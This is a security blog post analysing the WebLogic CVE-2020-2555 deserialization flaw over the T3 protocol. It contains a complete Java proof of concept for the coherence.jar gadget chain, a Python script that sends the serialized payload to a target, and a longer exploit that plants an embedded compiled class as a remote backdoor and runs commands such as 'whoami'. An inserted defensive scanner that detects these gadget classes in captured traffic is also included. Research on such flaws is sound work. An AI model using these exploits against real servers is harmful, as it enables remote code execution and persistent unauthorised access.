WebLogic CVE-2020-2555: deserialization and command echo implementation


Preface: analysis notes on CVE-2020-2555 in the WebLogic middleware

Introduction to CVE-2020-2555

On January 15, 2020, Oracle released a batch of security patches; among them, the Oracle WebLogic Server product had a high-severity vulnerability, numbered CVE-2020-2551.

Causes:

1. WebLogic enables the T3 protocol by default, and an attacker can use T3 to deliver a deserialization payload and achieve remote code execution.

2. CVE-2020-2555 stems from classes in coherence.jar that can be used to build a gadget (deserialization construction classes). The gadget is transported and parsed over the T3 protocol that WebLogic enables by default, so the WebLogic server deserializes the malicious object and finally executes the attacker's command.

Environment setup

WebLogic Server version 12.2.1.4.0

JDK 8u181

This took me a whole morning, so here is a brief note. If you want to change the WebLogic startup path or the Java variable directory, you only need to edit the relevant startup scripts. I changed the Java variable directory in the following paths; I did not change WebLogic's own path, which should also be changeable, but there are many places to edit, so I only changed the Java path.

I chose the startup program under the wl_server directory. WebLogic has three startup programs by default; the one under wl_server listens on port 7001, the others listen on different ports, but they are otherwise the same.

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\bin\startWebLogic.cmd

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\bin\setDomainEnv.cmd

C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\startWebLogic.cmd

Then visit http://127.0.0.1:7001/console, as shown in the figure below.

My computer couldn't keep up, so I debugged directly on the local machine.

What is the WebLogic T3 protocol

A quick recap of RMI: RMI lets code in one JVM call a method on another JVM over the network; the two sides communicate by serializing RemoteCall objects and sending them over a socket.

T3 is the protocol used to transport information between WebLogic Server and other kinds of Java programs, so WebLogic's communication uses T3. My understanding is that Java's RMI performs remote calls over JRMP, while WebLogic's RMI performs remote calls over its own T3 protocol.

Why does WebLogic use T3 instead of JRMP? A T3 connection maximizes efficiency by eliminating the multiple protocols otherwise used to communicate across the network, thereby using fewer operating-system resources. The T3 protocol also improves efficiency and minimizes packet size, increasing the speed of the transport.

Characteristics of the T3 protocol:

The server continuously tracks whether the client is alive (heartbeat mechanism); the heartbeat interval is usually 60 seconds, and if the server receives no heartbeat for more than 240 seconds it declares the client connection lost.
All data packets can be transmitted over a single established connection, optimizing packet size and network consumption.

Reference: http://cn.voidcc.com/question/p-vhilltff-bgn.html

CVE-2020-2555 vulnerability analysis

CVE-2020-2555 stems from classes in coherence.jar that can be used to build a gadget (deserialization construction classes). The gadget is transported and parsed over the T3 protocol that WebLogic enables by default, so the WebLogic server deserializes the malicious object and finally executes the attacker's command.

So we go straight to the gadget in coherence.jar; the call chain is as follows:

 * gadget:
 *      BadAttributeValueExpException.readObject()
 *          com.tangosol.util.filter.LimitFilter.toString()
 *              com.tangosol.util.extractor.ChainedExtractor.extract()
 *                  com.tangosol.util.extractor.ReflectionExtractor.extract()
 *                      Method.invoke()
 *                      ...
 *                      Runtime.getRuntime.exec()

com.tangosol.util.extractor.ReflectionExtractor

Following the call chain, first look at the extract method of ReflectionExtractor. It receives an oTarget object, uses findMethod to reflectively obtain the method of oTarget with the configured name and parameter types, caches it in the m_methodPrev field, and finally calls method.invoke.

    public E extract(T oTarget) {
        if (oTarget == null) {
            return null;
        } else {
            Class clz = oTarget.getClass();

            try {
                Method method = this.m_methodPrev;
                if (method == null || method.getDeclaringClass() != clz) {
                    this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
                }

                return method.invoke(oTarget, this.m_aoParam);
            } catch (NullPointerException var4) {
                throw new RuntimeException(this.suggestExtractFailureCause(clz));
            } catch (Exception var5) {
                throw ensureRuntimeException(var5, clz.getName() + this + '(' + oTarget + ')');
            }
        }
    }

The method with the specified parameters is obtained on the oTarget object via this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);

Let's look at how it obtains the method; it turns out to be the same pattern as the Commons Collections (CC) gadget chain.

import com.tangosol.util.extractor.ReflectionExtractor;

public class CVE_2020_2555 {
    public static void main(String[] args) throws Exception {
        // Resolves Runtime.class.getMethod("getRuntime") through the extractor's reflection
        ReflectionExtractor reflectionExtractor = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]});
        Object extract = reflectionExtractor.extract(Runtime.class);
        System.out.println(extract);
    }
}

A bare ReflectionExtractor cannot be exploited on its own, for the following reason

So let's move on to com.tangosol.util.extractor.ChainedExtractor

com.tangosol.util.extractor.ChainedExtractor

The extract method of ChainedExtractor performs chained invocation: the output of each extractor becomes the input of the next

    @JsonbCreator
    public ChainedExtractor(@JsonbProperty("extractors") ValueExtractor[] aExtractor) {
        super(aExtractor);
        this.m_nTarget = this.computeTarget();
    }

    public E extract(Object oTarget) {
        ValueExtractor[] aExtractor = this.getExtractors();
        int i = 0;

        for(int c = aExtractor.length; i < c && oTarget != null; ++i) {
            oTarget = aExtractor[i].extract(oTarget);
        }

        return oTarget;
    }

So at this point the construction looks like the following: an array of ReflectionExtractor objects is passed into ChainedExtractor, and the extract method of the ChainedExtractor object then invokes them in a chain

import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;

public class CVE_2020_2555 {
    public static void main(String[] args) throws Exception {

        // Runtime.class -> getMethod("getRuntime") -> invoke() -> exec(...)
        ReflectionExtractor[] reflectionExtractors = new ReflectionExtractor[]{
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{"null", new Class[0]}),
                new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", "calc"}})
        };
        
        ChainedExtractor chainedExtractor = new ChainedExtractor(reflectionExtractors);
        chainedExtractor.extract(Runtime.class);
    }
}

ChainedExtractor likewise cannot be exploited on its own, because deserialization by itself never calls extract

com.tangosol.util.filter.LimitFilter

Go straight to toString: extractor.extract(this.m_oAnchorTop) is called there

    public String toString() {
        StringBuilder sb = new StringBuilder("LimitFilter: (");
        sb.append(this.m_filter).append(" [pageSize=").append(this.m_cPageSize).append(", pageNum=").append(this.m_nPage);
        if (this.m_comparator instanceof ValueExtractor) {
            ValueExtractor extractor = (ValueExtractor)this.m_comparator;
            sb.append(", top=").append(extractor.extract(this.m_oAnchorTop)).append(", bottom=").append(extractor.extract(this.m_oAnchorBottom));
        } else if (this.m_comparator != null) {
            sb.append(", comparator=").append(this.m_comparator);
        }

        sb.append("])");
        return sb.toString();
    }

Looking further at m_oAnchorTop in extractor.extract(this.m_oAnchorTop), the variable is controllable, so it can be replaced with Runtime.class to execute a command

Note that ChainedExtractor implements the Comparator interface, which is why it can be stored in the Comparator-typed m_comparator field and pass the instanceof ValueExtractor check

Testing shows it still pops the calculator window

Likewise, deserialization on its own still cannot call toString on the object, so another object is needed

BadAttributeValueExpException

Deserializing a BadAttributeValueExpException calls toString on the specified object

Tested; it can be triggered

The final POC is as follows. It is recommended to set all fields via reflection, otherwise there will be problems

import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class CVE_2020_2555 {
    public static void main(String[] args) throws Exception {

        ReflectionExtractor[] reflectionExtractors = new ReflectionExtractor[]{
                new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
                new ReflectionExtractor("invoke", new Object[]{"null", new Class[0]}),
                new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", "calc"}})
        };

        ChainedExtractor chainedExtractor = new ChainedExtractor(reflectionExtractors);
        LimitFilter limitFilter = new LimitFilter();

        Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
        m_comparator.setAccessible(true);
        m_comparator.set(limitFilter, chainedExtractor);
        Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
        m_oAnchorTop.setAccessible(true);
        m_oAnchorTop.set(limitFilter, Runtime.class);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException, limitFilter);

        try {
            ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("weblogic_2020_2551.ser"));
            os.writeObject(badAttributeValueExpException);
            os.close();
            ObjectInputStream is = new ObjectInputStream(new FileInputStream("weblogic_2020_2551.ser"));
            is.readObject();
        } catch (Exception e) {
            e.printStackTrace();
        }

    }
}

How is it exploited over the T3 protocol?

Key point: WebLogic's T3 and HTTP services share port 7001

After building the payload, it has to be sent over T3 to the remote parsing point; let's look at how the transport works

Reference: http://drops.xmd5.com/static/drops/web-13470.html

I just took screenshots and put them in the blog for reference

It is implemented as follows

You can use this format directly; only the payloadObj data in the middle needs to be replaced

# author: zpchcbd
import socket
import os
import sys
import struct
from binascii import a2b_hex, b2a_hex

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)

server_address = (sys.argv[1], int(sys.argv[2]))
print('[+] Connecting to {} port {}'.format(server_address[0], server_address[1]))
sock.connect(server_address)

# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print('sending "{}"'.format(headers))
sock.sendall(headers.encode())

data = sock.recv(1024)
print('[+] received "%s"' % data)

payloadObj = open(sys.argv[3],'rb').read()
payload = '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'
payload=payload+str(b2a_hex(payloadObj).decode())
payload=payload+'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s' % (('{:08x}'.format(len(payload) // 2 + 4), payload))

print('[+] Sending payload...')
sock.send(bytes.fromhex(payload))
data = sock.recv(1024)
print('received "%s"' % data)
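As an added defensive example (not code from the original post), the following Python scanner recognises the T3 client hello sent by the script above, detects a Java serialization stream (0xACED0005) inside the T3 message, and lists the class descriptor names it carries without deserializing anything, flagging the four gadget classes from the chain analysed in the sections above. The sample captures are constructed; only the hello values are copied from the script.

```python
import re

STREAM_MAGIC = b"\xac\xed\x00\x05"   # java.io.ObjectStreamConstants.STREAM_MAGIC
TC_CLASSDESC = 0x72                  # java.io.ObjectStreamConstants.TC_CLASSDESC

# Classes in the CVE-2020-2555 chain above; ReflectionExtractor is what Oracle's patch blacklisted.
GADGET_CLASSES = {
    "javax.management.BadAttributeValueExpException",
    "com.tangosol.util.filter.LimitFilter",
    "com.tangosol.util.extractor.ChainedExtractor",
    "com.tangosol.util.extractor.ReflectionExtractor",
}
# T3 client hello in the form the script above sends: "t3 <version>\nAS:<n>\nHL:<n>\n..."
T3_HELLO = re.compile(rb"^t3s? (\d+(?:\.\d+)*)\nAS:(\d+)\nHL:(\d+)\n")
CLASS_NAME = re.compile(rb"[A-Za-z_$\[][\w$.;]*")


def parse_t3_hello(data):
    """Return (protocol_version, AS, HL) when data opens with a T3 hello, else None."""
    m = T3_HELLO.match(data)
    return (m.group(1).decode(), int(m.group(2)), int(m.group(3))) if m else None


def class_names(stream):
    """Class names from TC_CLASSDESC records (0x72, u16 length, name); nothing is deserialized."""
    names, i = [], stream.find(STREAM_MAGIC)
    if i < 0:
        return names
    i += len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            n = int.from_bytes(stream[i + 1:i + 3], "big")
            name = stream[i + 3:i + 3 + n]
            if 0 < n == len(name) and CLASS_NAME.fullmatch(name):
                names.append(name.decode("ascii"))
                i += 3 + n
                continue
        i += 1
    return names


def scan_t3_capture(data):
    """Hello fields, presence of a Java serialization stream, and gadget classes it names."""
    return {
        "t3_hello": parse_t3_hello(data),
        "java_serialized": STREAM_MAGIC in data,
        "gadget_classes": [c for c in class_names(data) if c in GADGET_CLASSES],
    }


def _classdesc(name):
    # Constructed TC_OBJECT + TC_CLASSDESC prefix: enough for the scanner, not a full record.
    return b"\x73\x72" + len(name).to_bytes(2, "big") + name.encode() + b"\x00" * 8


# Constructed sample captures: the hello the script above sends, then a T3 message carrying
# a stream whose descriptors mirror the POC's object graph, or a benign one for contrast.
SAMPLE_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n"
SAMPLE_ATTACK = SAMPLE_HELLO + b"\xfe\x01\x00\x00" + STREAM_MAGIC + b"".join(
    _classdesc(c) for c in ("javax.management.BadAttributeValueExpException",
                            "com.tangosol.util.filter.LimitFilter",
                            "com.tangosol.util.extractor.ChainedExtractor",
                            "com.tangosol.util.extractor.ReflectionExtractor"))
SAMPLE_BENIGN = SAMPLE_HELLO + b"\xfe\x01\x00\x00" + STREAM_MAGIC + _classdesc("java.util.HashMap")

if __name__ == "__main__":
    for label, capture in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(label, scan_t3_capture(capture))
```

The descriptor scan is a name heuristic on the plaintext T3 stream: it will not see names split across reassembly boundaries or anything inside t3s (TLS) traffic, so it complements rather than replaces the server-side class blacklist mentioned in the fix section.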

Echo (command output)

I won't analyze this part here; you can try it yourselves. I'll describe the pitfalls I ran into.

Pitfall: because I'm on the newer version 12.2.1.4.0, the approach I saw online of using DefiningClassLoader to deserialize the RMI instance does not work.

So here the ClasspathClassLoader class is used to deserialize the RMI instance; its defineClass is likewise public and defines the class from a byte array.

package com.zpchcbd.weblogic;

import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.T3ProtocolOperation;
import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;
import org.mozilla.classfile.DefiningClassLoader;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jndi.Environment;
import weblogic.utils.classloaders.ClasspathClassLoader;

import javax.management.BadAttributeValueExpException;
import javax.naming.Context;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;

public class CVE_2020_2555_UP {

    static String host = "192.168.0.108";
    static String port = "7001";
    static final String className = "com.zpchcbd.weblogic.RemoteImpl";
    static byte[] classByte = new byte[]{-54,-2,-70,-66,0,0,0,52,0,-123,10,0,30,0,80,7,0,81,10,0,2,0,80,7,0,82,10,0,4,0,80,8,0,83,11,0,84,0,85,7,0,86,7,0,87,10,0,9,0,80,8,0,50,11,0,88,0,89,8,0,90,7,0,91,10,0,14,0,92,10,0,14,0,93,10,0,14,0,94,7,0,95,7,0,96,10,0,97,0,98,10,0,19,0,99,10,0,18,0,100,7,0,101,10,0,23,0,80,10,0,18,0,102,10,0,23,0,103,8,0,104,10,0,23,0,105,10,0,8,0,106,7,0,107,7,0,108,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,18,76,111,99,97,108,86,97,114,105,97,98,108,101,84,97,98,108,101,1,0,4,116,104,105,115,1,0,33,76,99,111,109,47,122,112,99,104,99,98,100,47,119,101,98,108,111,103,105,99,47,82,101,109,111,116,101,73,109,112,108,59,1,0,4,109,97,105,110,1,0,22,40,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,6,114,101,109,111,116,101,1,0,7,99,111,110,116,101,120,116,1,0,22,76,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,59,1,0,4,97,114,103,115,1,0,19,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,13,83,116,97,99,107,77,97,112,84,97,98,108,101,7,0,86,1,0,17,115,101,116,83,101,114,118,101,114,76,111,99,97,116,105,111,110,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,3,99,109,100,1,0,18,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,10,69,120,99,101,112,116,105,111,110,115,7,0,109,1,0,17,103,101,116,83,101,114,118,101,114,76,111,99,97,116,105,111,110,1,0,38,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,4,99,109,100,115,1,0,16,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,59,1,0,14,112,114,111,99,101,115,115,66,117,105,108,100,101,114,1,0,26,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,59,1,0,4,112,114,111,99,1,0,19,76,106,97,11
8,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,2,98,114,1,0,24,76,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,59,1,0,2,115,98,1,0,24,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,1,0,4,108,105,110,101,1,0,1,101,1,0,21,76,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,59,1,0,22,76,111,99,97,108,86,97,114,105,97,98,108,101,84,121,112,101,84,97,98,108,101,1,0,36,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,60,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,62,59,7,0,81,7,0,110,7,0,111,7,0,91,7,0,112,7,0,95,7,0,101,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,15,82,101,109,111,116,101,73,109,112,108,46,106,97,118,97,12,0,32,0,33,1,0,31,99,111,109,47,122,112,99,104,99,98,100,47,119,101,98,108,111,103,105,99,47,82,101,109,111,116,101,73,109,112,108,1,0,27,106,97,118,97,120,47,110,97,109,105,110,103,47,73,110,105,116,105,97,108,67,111,110,116,101,120,116,1,0,7,122,112,99,104,99,98,100,7,0,113,12,0,114,0,115,1,0,19,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,1,0,19,106,97,118,97,47,117,116,105,108,47,65,114,114,97,121,76,105,115,116,7,0,111,12,0,116,0,117,1,0,2,47,99,1,0,24,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,12,0,32,0,118,12,0,119,0,120,12,0,121,0,122,1,0,22,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,1,0,25,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,82,101,97,100,101,114,7,0,112,12,0,123,0,124,12,0,32,0,125,12,0,32,0,126,1,0,22,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,12,0,127,0,-128,12,0,-127,0,-126,1,0,1,10,12,0,-125,0,-128,12,0,-124,0,-128,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,1,0,46,119,101,98,108,111,103,105,99,47,99,108,117,115,116,101,114,47,115,105,110,103,108,101,116,111,110,47,67,108,117,115,116,101,114,77,97,115,116,101,11
4,82,101,109,111,116,101,1,0,24,106,97,118,97,47,114,109,105,47,82,101,109,111,116,101,69,120,99,101,112,116,105,111,110,1,0,16,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,1,0,14,106,97,118,97,47,117,116,105,108,47,76,105,115,116,1,0,17,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,1,0,20,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,1,0,6,114,101,98,105,110,100,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,41,86,1,0,3,97,100,100,1,0,21,40,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,41,90,1,0,19,40,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,59,41,86,1,0,19,114,101,100,105,114,101,99,116,69,114,114,111,114,83,116,114,101,97,109,1,0,29,40,90,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,59,1,0,5,115,116,97,114,116,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,14,103,101,116,73,110,112,117,116,83,116,114,101,97,109,1,0,23,40,41,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,1,0,24,40,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,41,86,1,0,19,40,76,106,97,118,97,47,105,111,47,82,101,97,100,101,114,59,41,86,1,0,8,114,101,97,100,76,105,110,101,1,0,20,40,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,6,97,112,112,101,110,100,1,0,44,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,1,0,8,116,111,83,116,114,105,110,103,1,0,10,103,101,116,77,101,115,115,97,103,101,0,33,0,2,0,30,0,1,0,31,0,0,0,4,0,1,0,32,0,33,0,1,0,34,0,0,0,47,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,2,0,35,0,0,0,6,0,1,0,0,0,13,0,36,0,0,0,12,0,1,0,0,0,5,0,37,0,38,0,0,0,9,0,39,0,40,0,1,0,34,0,0,0,-123,0,3,0,3,0,0,0,30,-69,0,2,89,-73,0,3,76,-69,0,4,89,-73,0,5,77,44,18,6,43,-
71,0,7,3,0,-89,0,4,76,-79,0,1,0,0,0,25,0,28,0,8,0,3,0,35,0,0,0,26,0,6,0,0,0,17,0,8,0,18,0,16,0,19,0,25,0,22,0,28,0,20,0,29,0,23,0,36,0,0,0,32,0,3,0,8,0,17,0,41,0,38,0,1,0,16,0,9,0,42,0,43,0,2,0,0,0,30,0,44,0,45,0,0,0,46,0,0,0,7,0,2,92,7,0,47,0,0,1,0,48,0,49,0,2,0,34,0,0,0,63,0,0,0,3,0,0,0,1,-79,0,0,0,2,0,35,0,0,0,6,0,1,0,0,0,29,0,36,0,0,0,32,0,3,0,0,0,1,0,37,0,38,0,0,0,0,0,1,0,50,0,51,0,1,0,0,0,1,0,44,0,51,0,2,0,52,0,0,0,4,0,1,0,53,0,1,0,54,0,55,0,2,0,34,0,0,1,126,0,5,0,8,0,0,0,124,-69,0,9,89,-73,0,10,77,44,18,11,-71,0,12,2,0,87,44,18,13,-71,0,12,2,0,87,44,43,-71,0,12,2,0,87,-69,0,14,89,44,-73,0,15,78,45,4,-74,0,16,87,45,-74,0,17,58,4,-69,0,18,89,-69,0,19,89,25,4,-74,0,20,-73,0,21,-73,0,22,58,5,-69,0,23,89,-73,0,24,58,6,25,5,-74,0,25,89,58,7,-58,0,19,25,6,25,7,-74,0,26,18,27,-74,0,26,87,-89,-1,-24,25,6,-74,0,28,-80,77,44,-74,0,29,-80,0,1,0,0,0,117,0,118,0,8,0,4,0,35,0,0,0,58,0,14,0,0,0,36,0,8,0,38,0,17,0,39,0,26,0,40,0,34,0,42,0,43,0,43,0,49,0,44,0,55,0,46,0,76,0,47,0,85,0,50,0,96,0,51,0,112,0,54,0,118,0,55,0,119,0,56,0,36,0,0,0,92,0,9,0,8,0,110,0,56,0,57,0,2,0,43,0,75,0,58,0,59,0,3,0,55,0,63,0,60,0,61,0,4,0,76,0,42,0,62,0,63,0,5,0,85,0,33,0,64,0,65,0,6,0,93,0,25,0,66,0,51,0,7,0,119,0,5,0,67,0,68,0,2,0,0,0,124,0,37,0,38,0,0,0,0,0,124,0,50,0,51,0,1,0,69,0,0,0,12,0,1,0,8,0,110,0,56,0,70,0,2,0,46,0,0,0,52,0,3,-1,0,85,0,7,7,0,71,7,0,72,7,0,73,7,0,74,7,0,75,7,0,76,7,0,77,0,0,-4,0,26,7,0,72,-1,0,5,0,2,7,0,71,7,0,72,0,1,7,0,47,0,52,0,0,0,4,0,1,0,53,0,1,0,78,0,0,0,2,0,79};

    public static void main(String[] args) throws Exception {

        try {
            String url = "t3://" + host + ":" + port;
            // Install the RMI instance
//            invokeRMI(className, classByte);

            // Call the RMI instance to execute a command
            Environment environment = new Environment();
            environment.setProviderUrl(url);
            environment.setEnableServerAffinity(false);
            environment.setSSLClientTrustManager(new WeblogicTrustManager());
            Context context = environment.getInitialContext();
            ClusterMasterRemote remote = (ClusterMasterRemote) context.lookup("zpchcbd");
            String res = remote.getServerLocation("whoami");
            System.out.println(res);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    private static void invokeRMI(String className, byte[] classByte) throws Exception {

        ValueExtractor[] valueExtractors = new ValueExtractor[]{
                new ReflectionExtractor("getDeclaredConstructor", new Object[]{new Class[0]}),
                new ReflectionExtractor("newInstance", new Object[]{new Object[0]}),
                new ReflectionExtractor("defineCodeGenClass", new Object[]{className, classByte, null}),
                new ReflectionExtractor("getMethod", new Object[]{"main", new Class[]{String[].class}}),
                new ReflectionExtractor("invoke", new Object[]{null, new Object[]{null}})
        };

        ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);
        LimitFilter limitFilter = new LimitFilter();

        Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
        m_comparator.setAccessible(true);
        m_comparator.set(limitFilter, chainedExtractor);
        Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
        m_oAnchorTop.setAccessible(true);
        m_oAnchorTop.set(limitFilter, ClasspathClassLoader.class);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException, limitFilter);

        Object obj = new MarshalledObject(badAttributeValueExpException);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();

        byte[] payload = out.toByteArray();
        T3ProtocolOperation.send(host, port, payload);
    }
}

The result is shown below

Fix

Because this class is a blacklist bypass, the official fix adds ReflectionExtractor to the blacklist. But CVE-2020-2883 bypassed this fix; the next post will study CVE-2020-2883.

